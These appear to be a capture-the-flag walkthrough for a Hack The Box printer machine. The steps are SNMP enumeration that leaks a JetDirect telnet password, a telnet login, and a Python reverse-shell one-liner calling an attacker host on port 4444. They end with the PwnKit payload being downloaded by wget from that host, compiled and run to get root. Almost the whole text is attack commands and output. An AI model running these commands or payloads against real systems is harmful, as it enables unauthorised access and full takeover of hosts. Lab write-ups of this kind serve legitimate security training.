10.10.11.107
ttl 63

[+]NMAP[+]
PORT   STATE SERVICE VERSION
23/tcp open  telnet?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, Help, RPCCheck, RTSPRequest, tn3270: 
|     JetDirect
|     Password:
|   NULL: 
|_    JetDirect

PORT      STATE  SERVICE
161/udp   open   snmp  SNMPv1 server (public)

[+]snmpwalk[+]
https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp
https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp#oid-example
 
 
❯ snmpwalk -v 1 -c public 10.10.11.107
iso.3.6.1.2.1 = STRING: "HTB Printer"

Telnet service require a password and it says HP JetDirect.
Let's enumerate the password using .1.3.6.1.4.1.11.2.3.9.1.1.13.0 MIB

❯ snmpwalk -v 2c -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 
33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135


[+]Decode hex hash
       │ File: Decode.py
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ import binascii
   2   │ 
   3   │ hash = "50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 1
       │ 03 106 111 114 115 119 122 123 126 130 131 134 135"
   4   │ 
   5   │ binascii.unhexlify(hash.replace(' ',''))


❯ pyhton3 decode.py
P@ssw0rd@123!!123

❯ telnet 10.10.11.107
Pass : P@ssw0rd@123!!123

> exec cat user.txt



[+]INTRUSION[+]
> exec python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
❯ nc -lvnp 4444

lp@antique:~$ hostname -I
10.10.11.107


[+]PRIVILAGE ESCALATION[+]
lp@antique:/var/spool/cron$ find / -perm /4000 2>/dev/null
/usr/bin/pkexec

lp@antique:/dev/shm$ wget http://10.10.14.2/PwnKit.c
lp@antique:/dev/shm$ chmod +x PwnKit.c 
lp@antique:/dev/shm$ gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC
lp@antique:/dev/shm$ ./PwnKit

root@antique:/dev/shm# cat /root/root.txt 

